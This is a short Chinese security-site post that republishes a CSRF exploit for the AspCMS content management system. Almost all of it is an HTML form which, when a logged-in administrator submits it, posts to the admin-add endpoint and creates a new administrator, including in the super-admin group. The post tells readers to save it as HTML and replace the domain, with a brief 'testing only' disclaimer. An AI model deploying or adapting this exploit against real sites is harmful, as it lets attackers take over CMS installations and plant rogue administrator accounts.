aspcmsCSRF漏洞利用exp

颓废 2019年5月19日10:44:26评论548 views字数 906阅读3分1秒阅读模式
摘要

exp: 请保存为html 替换其中域名 只做测试 不做日站

aspcmsCSRF漏洞利用exp

exp:

<FORM name="form" action="https://www.0dayhack.com/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add" method="post" >  <TD align=middle width=100 height=30>管理员组</TD>  <select name="GroupID" id="GroupID">  <option value="1" >超级管理员组</option>  <option value="6" >lpyuan</option>  <option value="5" >普通管理员</option>  </select>  <TD align=middle width=100 height=30>管理员名称</TD>  <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="LoginName"/>  <TD align=middle width=100 height=30>管理员密码</TD>  <INPUT  type="Password" class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="Password"/>   <TD align=middle width=100 height=30>管理员描述</TD>  <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="AdminDesc"/>  <TD align=middle width=100 height=30>状态</TD>  <INPUT class="checkbox" type="checkbox" name="UserStatus" checked="checked" value="1"/>  <INPUT class="button" type="submit" value="添加" />    </FORM>

请保存为html 替换其中域名 只做测试 不做日站

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:44:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   aspcmsCSRF漏洞利用exphttp://cn-sec.com/archives/67421.html

发表评论

匿名网友 填写信息